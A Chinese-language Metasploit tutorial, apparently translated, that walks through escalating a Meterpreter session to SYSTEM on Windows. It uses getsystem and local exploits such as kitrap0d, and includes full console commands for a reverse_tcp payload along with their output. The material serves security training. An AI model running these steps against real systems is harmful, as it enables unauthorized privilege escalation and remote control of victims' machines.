seo优化_前端开发_渗透技术通常,尤其是对于客户端漏洞利用,您会发现您的会话仅具有有限的用户权限。这会严重限制您可以在远程系统上执行的操作,例如转储密码,操纵注册表,安装后门等。幸运的是,Metasploit具有Meterpreter脚本getsystem,它将使用多种不同的技术来尝试获得SYSTEM级别。远程系统上的特权。还有其他各种(本地)漏洞也可用于提升特权。
昭著的“ Aurora”漏洞,会发现Meterpreter会话仅以常规用户帐户运行。
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.161 [*] Sending stage (748544 bytes) to 192.168.1.161 [*] Meterpreter session 3 opened (192.168.1.71:38699 -> 192.168.1.161:4444) at 2010-08-21 13:39:10 -0600 msf exploit(ms10_002_aurora) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid Server username: XEN-XP-SP2-BARE\victim meterpreter >
获取系统
要使用getsystem命令,如果尚未加载,则需要先加载“ priv”扩展名。
meterpreter > use priv Loading extension priv...success. meterpreter >
使用-h开关运行getsystem 将显示我们可用的选项。
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
meterpreter >
我们将让Metasploit通过不带任何选项的getsystem运行来为我们做繁重的工作。该脚本将尝试所有可用的方法,并在成功时停止。眨眼之间,我们的会话现在就以SYSTEM特权运行。
meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
本地漏洞
在某些情况下,getsystem失败。例如:
meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter >
发生这种情况时,我们可以使会话成为后台,并手动尝试Metasploit必须提供的其他一些利用。注意:可用的漏洞利用会随着时间而变化。
meterpreter > background [*] Backgrounding session 1... msf exploit(ms10_002_aurora) > use exploit/windows/local/ ...snip... use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection ...snip... use exploit/windows/local/ms10_015_kitrap0d use exploit/windows/local/ms10_092_schelevator use exploit/windows/local/ms11_080_afdjoinleaf use exploit/windows/local/ms13_005_hwnd_broadcast use exploit/windows/local/ms13_081_track_popup_menu ...snip... msf exploit(ms10_002_aurora) >
让我们尝试对目标使用著名的kitrap0d漏洞。我们的示例框是一台32位计算机,被列为易受攻击的目标之一。
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d msf exploit(ms10_015_kitrap0d) > set SESSION 1 msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161 msf exploit(ms10_015_kitrap0d) > set LPORT 4443 msf exploit(ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST 192.168.1.161 yes The listen address LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf exploit(ms10_015_kitrap0d) > exploit [*] Started reverse handler on 192.168.1.161:4443 [*] Launching notepad to host the exploit... [+] Process 4048 launched. [*] Reflectively injecting the exploit DLL into 4048... [*] Injecting exploit into 4048 ... [*] Exploit injected. Injecting payload into 4048... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (769024 bytes) to 192.168.1.71 [*] Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
